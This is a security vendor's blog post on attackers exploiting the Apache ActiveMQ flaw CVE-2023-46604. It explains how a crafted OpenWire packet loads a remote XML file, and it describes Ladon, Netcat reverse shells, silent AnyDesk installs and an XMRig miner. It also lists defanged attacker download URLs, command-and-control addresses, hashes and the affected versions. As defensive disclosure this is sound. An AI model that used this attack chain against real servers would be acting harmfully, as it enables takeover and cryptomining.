Apache ActiveMQ Vulnerability (CVE-2023-46604) Continuously Being Exploited in Attacks – ASEC BLOG

In November 2023, AhnLab Security Emergency response Center (ASEC) published a blog post titled “Circumstances of the Andariel Group Exploiting an Apache ActiveMQ Vulnerability (CVE-2023-46604)” [1] which covered cases of the Andariel threat group exploiting the CVE-2023-46604 vulnerability to install malware. This post not only covered attack cases of the Andariel group but also those of HelloKitty Ransomware, Cobalt Strike, and Metasploit Meterpreter.

Since then, the Apache ActiveMQ vulnerability (CVE-2023-46604) has continued to be exploited by various threat actors. This post will cover the recent additional attacks that installed Ladon, NetCat, AnyDesk, and z0Miner.

1. Apache ActiveMQ Vulnerability (CVE-2023-46604) Attacks

CVE-2023-46604 is a remote code execution vulnerability in the open-source messaging and integration pattern server Apache ActiveMQ. If an unpatched Apache ActiveMQ is externally exposed, the threat actor can execute malicious commands from a remote location and take over the target system.

  • AhnLab TIP: Apache ActiveMQ Security Update Advisory (CVE-2023-46604) [2] (This report supports Korean only for now.)

The vulnerability attack involves manipulating a serialized class type in the OpenWire protocol to instantiate the class in classpath. When the threat actor transmits a manipulated packet, the vulnerable server references the path (URL) contained in the packet to load the XML configuration file for the class.

For example, the Java process for a vulnerable Apache ActiveMQ server references the given manipulated packet and loads an XML configuration file at “hxxp://27.191.193[.]193:555/poc2.xml”. Afterward, the loaded XML configuration file is referenced to execute designated commands. In the following case, a command is configured to use CMD and PowerShell to download Ladon before executing a reverse shell command.

Figure 1. A configuration file containing a command to install Ladon and execute a reverse shell

2. Ladon

As can be seen from the following GitHub page, Ladon is one of the tools that are mainly used by Chinese-speaking threat actors. [3] Ladon offers various features needed in the attack process. Major features include scanning, privilege escalation, account credential theft, and reverse shell.

Figure 2. Ladon’s GitHub page

The creator is continuously updating Ladon, and the malware also offers scanning for the relatively recent CVE-2023-46604 vulnerability.

Figure 3. Ladon’s scanning feature for the CVE-2023-46604 vulnerability

While it cannot be ascertained whether the threat actor used Ladon to scan for the vulnerability, after confirming that a vulnerable version of Apache ActiveMQ service was in use, they used the following PowerShell command to download Ladon and execute additional commands. ReverseTCP command refers to the execution of reverse shell, and Netcat (nc) was used for this purpose.

Figure 4. Reverse shell being executed through a vulnerability attack

3. AnyDesk & Netcat

While the Netcat command supported by Ladon was used in the attack case above, Netcat is also seen in other attack cases. Netcat is a utility for transmitting data to and from certain targets in a network connected by TCP/UDP protocol. It supports Linux as well as Windows environments. Because it offers various features for network testing, it can also be considered a tool frequently used by network administrators, but it is also a tool that can be exploited by threat actors.

Threat actors can use the commands that are transmitted when Netcat is launched to use it as a reverse shell or bind shell, and there are actual cases where Netcat was used in various attacks that targeted vulnerable web servers and MS-SQL servers. [4] [5] In the recently identified attack, Netcat was downloaded from an external source before the shell for the infected system was obtained using a reverse shell command.

Figure 5. Netcat being installed and executed through a vulnerability attack

Although the infected system can be controlled using a reverse shell, there is a limit to executing commands in a command line environment. Generally, after threat actors compromise the infected system, they tend to additionally install VNC, RDP, and other remote administration tools to control the system’s screen remotely. In particular, remote administration tools such as AnyDesk, NetSupport, and Chrome Remote Desktop have recently been used for bypassing security products. [6]

In the recently identified attack, the threat actor additionally installed AnyDesk after installing Netcat. The Netcat installed in the process above was used to install AnyDesk, and the setup file was downloaded from the download URL of the original AnyDesk website.

Figure 6. Installing AnyDesk using Netcat

After installing AnyDesk in silent mode, the threat actor set the password with the “–set-password” argument before launching the program.

Figure 7. AnyDesk launched with the configured password

This routine is almost identical to the one identified in a past attack case against MS-SQL servers.

Figure 8. The PowerShell routine to install AnyDesk identified in a past attack case

Afterwards, the threat actor would have connected to the infected system and used the password transmitted as the “–set-password” argument upon execution to remotely control the target system.

Figure 9. Logging in to the remote system where AnyDesk is installed

4. z0Miner

Recently, there were also attack campaigns where XMRig CoinMiner was installed. The name of the XML configuration file is “paste.xml”, and it includes data for using CMD to execute PowerShell commands as shown below. As a note, “shella” is presumed to be a PowerShell file, and the threat actor seems to have copied the PowerShell program under this name in a previous attack phase. The decrypted PowerShell command downloads and executes another PowerShell script.

Figure 10. The configuration file containing an encrypted PowerShell command

The downloaded PowerShell script is in a simple format, downloading and executing XMRig CoinMiner and the configuration file.

Figure 11. The PowerShell script that installs XMRig CoinMiner
Figure 12. The mining pool and wallet address in the configuration file

An analysis of the PowerShell script used in the attack revealed the variable names, function names, and overall structure to be similar to those of z0Miner. z0Miner was first reported in 2020 by the Tencent Security Team and was distributed via attacks exploiting the Oracle Weblogic remote code execution vulnerabilities (CVE-2020-14882/CVE-2020-14883). In 2021, there was a case where z0Miner was distributed through the Atlassian Confluence remote code execution vulnerability (CVE-2021-26084). [7] [8] This case was also covered in a past ASEC Blog post. [9]

5. Conclusion

Threat actors are continuously launching attacks against unpatched, vulnerable Apache ActiveMQ services. Out of such identified attacks, there were cases where CoinMiners were installed to mine cryptocurrencies, as well as many cases where malware were used to control the infected system. After compromising the infected system, threat actors can steal data or install ransomware.

System administrators must check if their current Apache ActiveMQ service is one of the susceptible versions below and apply the latest patches to prevent attacks that exploit known vulnerabilities.

Apache ActiveMQ versions 5.18.0 – 5.18.2
Apache ActiveMQ versions 5.17.0 – 5.17.5
Apache ActiveMQ versions 5.16.0 – 5.16.6
Apache ActiveMQ versions 5.15.15 or earlier
Apache ActiveMQ Legacy OpenWire Module versions 5.18.0 – 5.18.2
Apache ActiveMQ Legacy OpenWire Module versions 5.17.0 – 5.17.5
Apache ActiveMQ Legacy OpenWire Module versions 5.16.0 – 5.16.6
Apache ActiveMQ Legacy OpenWire Module versions 5.8.0 – 5.15.15

They should also use security programs such as firewalls for servers accessible from outside to restrict access by attackers. Finally, caution must be practiced by updating V3 to the latest version to block malware infection in advance.

File Detection
– Exploit/PS.Ladon (2023.12.09.00)
– Downloader/XML.Generic (2023.12.13.00)
– HackTool/Win.Netcat.R5561954 (2023.12.12.03)
– Downloader/XML.Generic (2023.12.13.00)
– CoinMiner/PS.Agent (2023.12.13.03)
– Win-Trojan/Miner3.Exp (2020.01.23.00)
– CoinMiner/Text.Config (2023.12.13.03)

Behavior Detection
– Execution/MDP.Powershell.M2514
– Execution/MDP.AnyDesk.M4547

IOC
MD5

– eb0e70ea44e578201df1e3c49e905144 : Ladon (Ladon.ps1)
– 1a7e8e719e29c2cca5083053bb240dbc : XML (poc2.xml)
– b6e0db27c2b3e62db616b0918a5d8ed8 : Netcat (ncat.exe)
– c1aa596dc33f2ba4aadbd689a1652701 : XML (paste.xml)
– baeee25ebf0efeec414dce64b9e7aca7 : Downloader (paste.ps1)
– 2a0d26b8b02bb2d17994d2a9a38d61db : XMRig (s.rar)
– da12148890bc665a8a27bf695955d8b0 : XMRig Config (config.json)

C&C
– 27.191.193[.]193:50000 : Ladon Netcat
– 62.233.50[.]97:6666 : Netcat

Download
– hxxp://27.191.193[.]193:555/Ladon.ps1 : Ladon
– hxxp://27.191.193[.]193:555/poc2.xml : XML
– hxxp://62.233.50[.]101:11197/ncat.exe : Netcat
– hxxp://121.190.90[.]250:8081/js/3/paste.xml : XML
– hxxp://121.190.90[.]250:8081/js/3/paste.ps1 : Downloader
– hxxp://121.190.90[.]250:8081/js/s.rar : XMRig
– hxxp://121.190.90[.]250:8081/js/3/config.json : XMRig Config

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Source: https://asec.ahnlab.com/en/59904/